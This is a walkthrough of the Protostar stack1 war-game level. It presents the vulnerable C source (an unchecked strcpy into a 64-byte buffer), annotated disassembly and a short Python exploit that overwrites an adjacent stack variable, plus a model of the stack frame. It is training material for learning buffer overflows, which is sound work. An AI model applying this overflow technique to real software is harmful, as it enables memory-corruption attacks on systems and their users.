Binary Exploitation Protostar Stack1 - Walkthrough - Writeup

Hello Guyz,




In this post I am going to show you how to beat Protostar stack1. Today's focus is variable overwriting: a simple technique for overwriting the value of a variable that lives on the stack while the program is running.

Before starting this walkthrough, I want to highlight a few points.

  • I'm not the creator of the Protostar war game. I am just a player.
  • Here I am only providing hints and reference material, so if you feel stuck anywhere, take a look here.


Source Code :

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <err.h>      /* declares errx(); missing in the shipped source */

int main(int argc, char **argv)
{
  volatile int modified;   /* sits just above buffer[] in this frame */
  char buffer[64];

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  strcpy(buffer, argv[1]);   /* no length check: argv[1] longer than 64 bytes overwrites modified */

  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}




Hint provided by Exploit Exercises:

This level looks at the concept of modifying variables to specific values in the program, and how the variables are laid out in memory.

This level is at /opt/protostar/bin/stack1

If you are unfamiliar with the hexadecimal being displayed, “man ascii” is your friend.
Protostar is little endian

Solution:

We simply need to overwrite the value of the `modified` variable located on the stack.
Before starting, let's look at how main()'s stack frame is laid out (offsets are bytes from esp, taken from the disassembly below: buffer at esp+0x1c = 28, modified at esp+0x5c = 92, frame ends at 0x60 = 96):


0                        28                                                      92        96
 ============================================================================================
        Other Things     |  buffer[64]  (Injectable Area)                       | modified | 
 ============================================================================================


Disassembly of main (Intel syntax)

   0x08048464 <+0>: push   ebp
   0x08048465 <+1>: mov    ebp,esp
   0x08048467 <+3>: and    esp,0xfffffff0
   0x0804846a <+6>: sub    esp,0x60                  << ====== Reserve 0x60 = 96 bytes for locals
   0x0804846d <+9>: cmp    DWORD PTR [ebp+0x8],0x1   << ====== Compare argc with 1
   0x08048471 <+13>: jne    0x8048487 <main+35>   << ====== Skip the errx() call if an argument was given
   0x08048473 <+15>: mov    DWORD PTR [esp+0x4],0x80485a0 
   0x0804847b <+23>: mov    DWORD PTR [esp],0x1
   0x08048482 <+30>: call   0x8048388 <errx@plt>
   0x08048487 <+35>: mov    DWORD PTR [esp+0x5c],0x0  << ===== modified = 0  (modified lives at esp+0x5c)
   0x0804848f <+43>: mov    eax,DWORD PTR [ebp+0xc]   << ===== eax = argv
   0x08048492 <+46>: add    eax,0x4                  << ===== eax = &argv[1]
   0x08048495 <+49>: mov    eax,DWORD PTR [eax]      << ===== eax = argv[1]
   0x08048497 <+51>: mov    DWORD PTR [esp+0x4],eax  << ===== 2nd strcpy argument (source) = argv[1]
   0x0804849b <+55>: lea    eax,[esp+0x1c]           << ===== buffer starts at esp+0x1c
   0x0804849f <+59>: mov    DWORD PTR [esp],eax      << ===== 1st strcpy argument (destination) = buffer
   0x080484a2 <+62>: call   0x8048368 <strcpy@plt>
   0x080484a7 <+67>: mov    eax,DWORD PTR [esp+0x5c]  << ===== eax = modified
   0x080484ab <+71>: cmp    eax,0x61626364            << ===== Compare with the target value
   0x080484b0 <+76>: jne    0x80484c0 <main+92>
   0x080484b2 <+78>: mov    DWORD PTR [esp],0x80485bc
   0x080484b9 <+85>: call   0x8048398 <puts@plt>
   0x080484be <+90>: jmp    0x80484d5 <main+113>
   0x080484c0 <+92>: mov    edx,DWORD PTR [esp+0x5c]
   0x080484c4 <+96>: mov    eax,0x80485f3
   0x080484c9 <+101>: mov    DWORD PTR [esp+0x4],edx
   0x080484cd <+105>: mov    DWORD PTR [esp],eax
   0x080484d0 <+108>: call   0x8048378 <printf@plt>
   0x080484d5 <+113>: leave  
   0x080484d6 <+114>: ret    



Exploit

#!/usr/bin/python
# -*- coding:utf-8 -*-
import struct

# Usage:  python exploit.py > tmp ; ./bin/stack1 $(cat tmp)

payload = "a"*64                          # fill buffer[64] completely
payload+= struct.pack("<I", 0x61626364)  # little-endian: bytes "dcba" land in `modified`


print payload
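To tie the hint (ASCII, little endian), the frame diagram and the exploit together, here is an added Python 3 example that is not part of the original post. It models main()'s frame purely from the three constants visible in the disassembly (frame size 0x60, buffer at esp+0x1c, modified at esp+0x5c), so you can predict what the "Try again, you got 0x%08x" line will print for any argv[1] before touching the binary, and it builds the same payload as the exploit above. The helper names (simulate, build_payload, outcome) and the 16 bytes of slack above the frame are my own assumptions for the model, not anything from the Protostar binary.

```python
#!/usr/bin/env python3
# Added example: a byte-level model of stack1's main() frame, built only
# from the offsets shown in the disassembly. Not code from the original post.
import struct

FRAME_SIZE = 0x60         # sub esp,0x60
BUF_OFF    = 0x1c         # lea eax,[esp+0x1c]          -> buffer[64]
MOD_OFF    = 0x5c         # mov DWORD PTR [esp+0x5c],0  -> modified
TARGET     = 0x61626364   # cmp eax,0x61626364
SLACK      = 16           # assumed: alignment padding / saved ebp above the locals


def offset_to_modified() -> int:
    """Bytes of argv[1] needed before the copy reaches `modified`."""
    return MOD_OFF - BUF_OFF            # 0x40 == 64 == sizeof(buffer)


def target_bytes() -> bytes:
    """How 0x61626364 must appear in memory on a little-endian CPU.
    `man ascii`: 0x61='a' 0x62='b' 0x63='c' 0x64='d', stored lowest byte first."""
    return struct.pack("<I", TARGET)    # b"dcba"


def simulate(arg: bytes) -> int:
    """modified = 0; strcpy(buffer, arg); return modified, on the modelled frame."""
    if b"\x00" in arg:
        raise ValueError("argv strings cannot contain NUL; strcpy stops at the first one")
    frame = bytearray(FRAME_SIZE + SLACK)
    struct.pack_into("<I", frame, MOD_OFF, 0)
    data = arg + b"\x00"                # strcpy copies the terminator as well
    end = BUF_OFF + len(data)
    if end > len(frame):
        raise ValueError("copy runs past the modelled frame and its slack")
    frame[BUF_OFF:end] = data
    return struct.unpack_from("<I", frame, MOD_OFF)[0]


def bytes_past_frame(arg: bytes) -> int:
    """How many copied bytes (terminator included) land above esp+0x60.
    The stock 68-byte payload spills exactly its NUL terminator there."""
    return max(0, BUF_OFF + len(arg) + 1 - FRAME_SIZE)


def build_payload(value: int = TARGET) -> bytes:
    """Same layout as the exploit above: 64 filler bytes, then the value little-endian."""
    return b"a" * offset_to_modified() + struct.pack("<I", value)


def outcome(arg: bytes) -> str:
    """What stack1 would print for this argv[1], according to the model."""
    modified = simulate(arg)
    if modified == TARGET:
        return "you have correctly got the variable to the right value"
    return "Try again, you got 0x%08x" % modified


if __name__ == "__main__":
    for probe in (b"a" * 64, b"a" * 65, b"a" * 68, build_payload()):
        print("%3d bytes -> %s" % (len(probe), outcome(probe)))
```

Running it shows the progression a first attempt usually goes through: 64 bytes leaves modified at 0 (only the NUL lands on it), 65 bytes gives 0x00000061, 68 bytes of "a" gives 0x61616161, and the built payload hits 0x61626364. Swap `"<I"` for `">I"` in build_payload() and the model reports 0x64636261, which is exactly the mistake the "Protostar is little endian" hint is warning about.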



Very Easy! Hahaha.


For a more detailed walkthrough, check the YouTube video playlist provided below.


